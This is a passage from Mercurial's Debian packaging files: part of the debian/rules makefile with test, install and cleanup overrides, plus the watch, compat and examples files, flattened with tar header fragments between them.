ifneq ($(or $(ARCH_IS_MIPS), $(ARCH_IS_KFREEBSD-i386), $(ARCH_IS_ARMEL), $(ARCH_IS_SPARC)),) sed -i.deb-backup -e 's/sleep 1/sleep 2/' $(CURDIR)/tests/test-pull-pull-corruption.t endif http_proxy='' dh_auto_test -- TESTFLAGS="--verbose --timeout 1440 $(PARALLEL_TEST_JOBS)" rename.ul .deb-backup '' $(CURDIR)/tests/* endif override_dh_auto_install: $(PYVERS:%=install-python%) install-python%: python$* setup.py install --root $(CURDIR)/debian/tmp --install-layout=deb # Do not hardcode the python interpreter sed -i '1c#!/usr/bin/python' debian/tmp/usr/bin/hg override_dh_install: dh_install if test -d $(CURDIR)/debian/mercurial ; then \ $(MAKE) -f debian/rules install-archdep ; \ fi if test -d $(CURDIR)/debian/mercurial-common ; then \ $(MAKE) -f debian/rules install-archindep ;\ fi install-archdep: # remove arch-independent python stuff find debian/mercurial/usr/lib \ ! -name '*.so' ! -type d -delete , \ -type d -empty -delete install-archindep: # Install system-wide conffiles. Note the rename from .hgrc # to .rc, which dh_install can't do if you list the file in # mercurial-common.install install -m 644 \ contrib/mergetools.hgrc \ $(CURDIR)/debian/mercurial-common/etc/mercurial/hgrc.d/mergetools.rc install -m 644 \ debian/cacerts.hgrc \ $(CURDIR)/debian/mercurial-common/etc/mercurial/hgrc.d/cacerts.rc # Move templates and help installed by setup.py to their FHS-correct location mv $(CURDIR)/debian/mercurial-common/usr/lib/python$(PYVER_DEFAULT)/dist-packages/mercurial/templates \ $(CURDIR)/debian/mercurial-common/usr/lib/python$(PYVER_DEFAULT)/dist-packages/mercurial/help \ $(CURDIR)/debian/mercurial-common/usr/share/mercurial mv $(CURDIR)/debian/mercurial-common/usr/lib/python$(PYVER_DEFAULT)/dist-packages/mercurial/locale \ $(CURDIR)/debian/mercurial-common/usr/share # If more than one Python version is supported, clean up the templates # and help installed for the other versions -rm -rf $(CURDIR)/debian/mercurial-common/usr/lib/python*/dist-packages/mercurial/templates \ $(CURDIR)/debian/mercurial-common/usr/lib/python*/dist-packages/mercurial/help \ $(CURDIR)/debian/mercurial-common/usr/lib/python*/dist-packages/mercurial/locale \ # remove arch-dependent python stuff find debian/mercurial-common/usr/lib \ -name '*.so' ! -type d -delete , \ -type d -empty -delete override_dh_python2: dh_python2 find debian/mercurial/usr/share -type d -empty -delete override_dh_auto_clean: mercurial/__version__.py cp -a mercurial/__version__.py mercurial/__version__.py.save dh_auto_clean mv mercurial/__version__.py.save mercurial/__version__.py $(RM) -rv tmp/ override_dh_clean: dh_clean -rm -f tests/test-check-pyflakes.t mercurial/__version__.py: @echo "$@ is missing (you probably call 'make clean' directly)." @echo "Restore it from sources before building the package" @echo "Aborting." exit 1 debian/watch0000664000000000000000000000031212261306601010212 0ustar # format version number, currently 3; this line is compulsory! version=3 opts="uversionmangle=s/-rc/~rc/,pgpsigurlmangle=s/$/.asc/" \ http://www.selenic.com/mercurial/release/mercurial-(.*)\.tar\.gz debian/compat0000664000000000000000000000000212201757705010374 0ustar 9 debian/mercurial-common.examples0000664000000000000000000000051612216001724014176 0ustar hgeditor contrib/dumprevlog contrib/hgsh contrib/hgweb.fcgi contrib/hgweb.wsgi contrib/mercurial.el contrib/perf.py contrib/python-hook-examples.py contrib/sample.hgrc contrib/simplemerge contrib/tcsh_completion contrib/tcsh_completion_build.sh contrib/tmplrewrite.py contrib/undumprevlog contrib/vim contrib/zsh_completion hgweb.cgi